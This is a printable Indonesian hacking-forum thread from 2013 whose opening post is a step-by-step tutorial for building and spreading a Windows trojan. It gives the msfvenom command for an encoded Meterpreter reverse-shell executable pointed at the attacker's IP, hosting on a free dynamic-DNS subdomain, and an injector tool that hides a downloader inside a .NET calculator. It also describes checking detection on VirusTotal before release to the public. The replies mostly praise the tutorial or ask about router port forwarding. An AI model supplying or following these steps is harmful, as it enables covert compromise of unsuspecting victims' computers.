Exploit windows dengan metode .net inzector downloader - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: Exploit windows dengan metode .net inzector downloader (/thread-4799.html) |
Exploit windows dengan metode .net inzector downloader - TrojanzBoy - 07-14-2013 OK tutor kali ini akan memperagakan adegan exploit pada ip public dengan tehnik manipulasi downloader ok disni kita kan bekerja menggunakan 2 os untuk membuat exploit yang jitu backtrack 5r3 dan windows 7 disini ip public saya (attacker) = 125.164.216.221 dan korban (victim) = 180.247.106.236 untuk melihat ip public bisa cek di http://www.whatismyip.com/ langkah pertama kita buka dulu buat dulu listener dari terminal backtrack dengan menggunakan perintah msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 LHOST=125.164.216.221 LPORT=4444 >trojanzboy.exe ganti ip merah dengan ip public kalian setelah itu terciptalah sebuah backdoor yang saya beri nama trojanzboy.exe pada directory root setelah itu pindah hasil backdoor tadi pada directory /var/www setelah di pindah sekarang masuk router dan forward ip local kalian pada router masukkan port 4444 dan 80 untuk listener dan apache disini ip local saya 192.168.1.12 setelah router tersetting aktifkan apache pada menu backtrack >> service >> httpd >> apache start kalau sudah selesai saatnya membungkus ip public saatnya membuat domain pada http://freedns.afraid.org/ kalau belum punya id daftarkan dulu ya setelah daftar langsung masuk subdomain klik add setelah selesai save setelah tersimpan saatnya buka terminal lalu masuk metasploit msfconsole dan masukkan exploit multi/handler dan exploit sekarang copy file backdoor yang telah di buat ada pada /var/www pada OS windows download tool inzectornya dulu untuk windows --> https://dl.dropboxusercontent.com/s/czq2oph5kxcofpg/Inzector%28By%20trojanzboy.blogspot.com%29.rar?token_hash=AAG_TkjtdSNqmNkzXE_ca1PCNmNv2TJl1qx0mffTPLqXRg&dl=1 lalu ekstrak hasil download ok buka program inzector lalu klik load dan masukkan program calculator / program .net kalian disini saya contohkan calculator saja lalu open setelah itu klik program >> klik 2x main dan pada menu downloader masukkan alamat domain yang kita buat pada http://freedns.afraid.org/ disini domain saya http://narutoupdate.strangled.net/ dan INGAT nama backdoor yang telah kita copy pada folder /var/www disini backdoor nya saya namakan trojanzboy.exe maka hasil urlnya adalah http://narutoupdate.strangled.net/trojanzboy.exe dan isi downloader path = hasil downloadnya saya taruh di system32 dan saya beri nama test dan klik inject dan tentukan letak hasil output disini saya beri nama trojanzboycrypted.exe dan saya taruh di desktop maka file ini siap disebarin ke public kita scan dengan virustotal dan jika file trojanzboycrypted.exe ini di jalankan maka program akan mendownload file dari http://narutoupdate.strangled.net/trojanzboy.exe dan meletakkan expoit pada \windows\system32\test.exe dan program .net calculator pun ikut jalan dan balik ke backtrack os dan apa yang terjadi sesi meterpreter pun exploit sukses terbuka juga . . . (07-14-2013, 10:58 PM)TrojanzBoy Wrote: RE: Exploit windows dengan metode .net inzector downloader - X-Code NewBie - 07-15-2013 kak masuk router itu gimana kak kog gak bisa ... router kand modem dah tak masukin user ama pass nya tapi kug muncul "http://192.168.1.1/cgi-bin/webcm?getpage=../html/frame.htm" RE: Exploit windows dengan metode .net inzector downloader - pemula - 07-16-2013 wah keren nich tutor y :-bd:-bd:-bd:-bd tp klo pke modem stik (USB) kira" cara setting NAT y gmn yah ?:-?:-?:-?:-?:-? RE: Exploit windows dengan metode .net inzector downloader - gnome_selpa - 07-16-2013 Nice share ... ijin icip mas bro RE: Exploit windows dengan metode .net inzector downloader - shozuoka - 07-16-2013 bolehh di coba neh, tp msh bner2 pengguna baru |